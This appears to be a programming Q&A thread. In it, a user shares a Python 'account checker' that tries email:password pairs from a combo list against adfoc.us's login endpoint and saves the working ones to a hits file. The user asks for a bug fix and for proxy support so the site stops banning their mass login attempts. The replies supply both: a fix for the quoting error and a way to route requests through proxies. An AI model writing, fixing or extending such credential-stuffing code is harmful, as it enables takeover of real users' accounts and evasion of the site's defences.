# Python Account Checker : Problem with checking

Tags: python, python-3.x

I tried to create Account Checker in python with specific combo list.My question contains 2 parts.First part is, my checker always show that accounts are invalid. I tried to put one valid one and it still shows invalid.

```
        import requests
from colorama import init
init()
from colorama import Fore, Back, Style

def failed(email, password):
    print(Fore.LIGHTRED_EX+"[-] "+email+" [-]")

def passed(email, password):
    print(Fore.LIGHTGREEN_EX+"[+] "+email+" [+]", file=open("Hits.txt", "w"))

def checker(data):
    email = data[0]
    password = data[1]
    success_keyword = """"<strong>Today's Earnings:</strong>"""
    api_sender = requests.session()
    source = api_sender.post("https://adfoc.us/session/create", data={"email": email,
                                                                      "password": password}).text

    if success_keyword in source:
        passed(email, password)
    else:
        failed(email, password)


combos = open("combo.txt", "r").readlines()
arrange = [lines.replace("\n", "")for lines in combos]
for lines in arrange:
    data = lines.split(":")
    checker(data)
```

I need to fix that checker shows valid and unvalid combo lists. Right now its showing only invalid ones, but some of them are valid accounts if you log manually on the site.

Second part of question is: How do I integrate proxies in my checker? If someone can copy this code and integrate them and send me the code here, I would be much much grateful.

Comment: `success_keyword` starts with four quotes instead of three, therefore the fourth quote is interpreted to be part of the string.  Presumably the text you're looking for does not include a literal double-quote mark, so it's never found.

Comment: @JohnGordon Thanks, do you know how can I add proxies to it?

Comment: I don't know what a proxy is.

Comment: @JohnGordon Well that specific site bans me when I check multiple accounts, how can I prevent that?

Answer (score 1):

To add a proxy, you use a dictionary, Like so:`proxy = {
"https" : "proxyipandportgoeshere"
}`

then you add the proxy argument to your post request,`a = requests.post("site" , proxies=proxy, data=data)`